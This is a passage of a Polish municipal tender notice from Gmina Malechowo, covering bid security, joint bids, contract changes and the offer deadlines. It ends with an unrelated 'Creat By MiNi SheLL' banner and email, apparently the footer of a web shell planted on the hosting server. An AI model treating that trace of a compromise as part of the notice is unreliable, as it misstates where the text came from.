wnieść przed upływem terminu składania ofert tj. Wykonawca, wnoszący<br/>wadium w pieniądzu zobowiązany jest do wpłacenia go odpowiednio wcześniej, tak aby znalazło<br/>się ono na wskazanym niżej koncie Zamawiającego przed datą i godziną składania<br/>ofert.3.Dowód wniesienia wadium w formie pieniężnej w celu ułatwienia Zamawiającemu<br/>identyfikacji wpływu wadium na konto Zamawiającego zaleca się dołączyć do oferty. 4. Wadium<br/>wnoszone w formie niepieniężnej powinno być wystawione na Gminę Malechowo, 76-142<br/>Malechowo 22A i zabezpieczać ofertę w całym okresie związania ofertą. 5. W przypadku<br/>wnoszenia wadium w formie innej niż pieniężna, za pośrednictwem Platformy Zakupowej –<br/>Zamawiający wymaga złożenia dokumentu w formie elektronicznej wraz z ofertą na zasadach<br/>określonych w rozdz. XIpkt 14 SWZ – z zastrzeżeniem, iż musi on być podpisany<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez<br/>gwaranta tj. wystawcę gwarancji/poręczenia.6. Wadium może być wnoszone według wyboru<br/>Wykonawcy w jednej lub kilku następujących formach: 1) pieniądzu na konto: Bank Spółdzielczy<br/>w Sławnie O/Malechowo nr 36 9317 1012 0040 0073 2000 0030 – Urząd Gminy Malechowo, 76-<br/>142 Malechowo 22 A; 2)gwarancjach bankowych; 3) gwarancjach ubezpieczeniowych; 4)<br/>poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2019 r.poz. 310, 836 i1572 ze zm.) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i do zawarcia umowy w sprawie<br/>zamówienia publicznego.2. Z pełnomocnictwa musi jednoznacznie wynikać umocowanie do<br/>reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>w przedmiotowym postępowaniu.3. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.4. W przypadku wspólnego<br/>ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa w rozdziale VIII<br/>pkt 1 ppkt 1 nin. SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenie to potwierdzać ma spełnianie warunków udziału w postępowaniu oraz brak<br/>podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu oraz brak podstaw do wykluczenia. Wymagane dokumenty<br/>potwierdzające brak podstaw do wykluczenia składa każdy z Wykonawców. 5. W przypadku<br/>wspólnego ubiegania się o zamówienie przez Wykonawców, każdy z Wykonawców jest<br/>zobowiązany złożyć oświadczenie, o którym mowa w rozdziale VIII pkt 1 ppkt 1.1 nin.<br/>SWZ.6.Uwaga: Przedsiębiorców prowadzących działalność w formie spółki cywilnej, na gruncie<br/>ustawy Prawo zamówień publicznych należy traktować jako Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony przewidują możliwość dokonania zmian umowy przewidzianych w art. 455 ust 1 pkt<br/>1Ustawy Pzp w niżej wymienionych przypadkach:1) Strony mają prawo do przedłużenia terminu<br/>zakończenia robót o okres trwania przyczyn, z powodu których będzie zagrożone dotrzymanie<br/>tego terminu, w następujących sytuacjach:a) jeżeli przyczyny, z powodu których będzie<br/>zagrożone dotrzymanie terminu zakończenia robót będą następstwem okoliczności, za które<br/>odpowiedzialność ponosi Zamawiający, w szczególności będą następstwem nieterminowego<br/>przekazania placu budowy, uzyskania dodatkowych zgód, uzgodnień, zezwoleń lub innych<br/>dokumentów obowiązujących przy realizacji procesu inwestycyjnego, konieczności zmian<br/>dokumentacji projektowej w zakresie, w jakim ww. okoliczności miały lub będą mogły mieć<br/>wpływ na dotrzymanie terminu zakończenia robót,b) gdy wystąpią niekorzystne warunki<br/>atmosferyczne rozumiane jako: długotrwałe opady deszczu, śniegu, gradu, występowanie<br/>wiatru, oblodzenia, wysokich i niskich temperatur trwających nieprzerwanie przez minimum 3 dni<br/>robocze, które uniemożliwiają prawidłowe wykonanie robót, w szczególności z powodu<br/>technologii realizacji prac określonych: umową, normami lub innymi przepisami, które wymagają<br/>konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie<br/>jest następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność; w takim<br/>przypadku Strony ustalą w pierwszej kolejności faktyczny wpływ powyższych zdarzeń na<br/>realizowany harmonogram prac oraz na konieczność jego modyfikacji w wyniku niewykonania<br/>zakładanych robót w pierwotnie zakładanym terminie; w zakresie zwłoki spowodowanego ilością<br/>dni z niekorzystnymi warunkami atmosferycznymi przyjmuje się, że umowa może zostać przedłużona o taką ilość dni, przez które nie było możliwości realizacji; w przypadku wpływu<br/>przestoju na dalszy harmonogram robót przedłużenie terminu będzie wynikiem konsultacji stron<br/>w tej sprawie,c) gdy wystąpi konieczność wykonania robót zamiennych lub innych robót<br/>niezbędnych do wykonania przedmiotu umowy ze względu na zasady wiedzy technicznej, oraz<br/>realizacji dodatkowych robót budowlanych, które wstrzymują lub opóźniają realizację przedmiotu<br/>Umowy,d) wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z<br/>jej postanowieniami,e) opóźnienia spowodowane uwarunkowaniami społecznymi (protesty,<br/>listy,petycje, itp.),f) konieczności prowadzenia dodatkowych uzgodnień z właścicielami urządzeń<br/>obcych lub właścicielami nieruchomości przyległych do terenu budowy,g) wystąpienia warunków<br/>geotechnicznych, których nie można było przewidzieć w chwili udzielenia<br/>zamówienie,h)wystąpienie wykopalisk, niewybuchów oraz okoliczności związanych z ochroną<br/>środowiska uniemożliwiających wykonanie robót.2) Wykonawca jest uprawniony do żądania<br/>zmiany umowy w zakresie materiałów, parametrów technicznych, technologii wykonania robót<br/>budowlanych,sposobu i zakresu wykonania przedmiotu umowy w następujących sytuacjach:a)<br/>konieczności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://malechowo.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-24 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com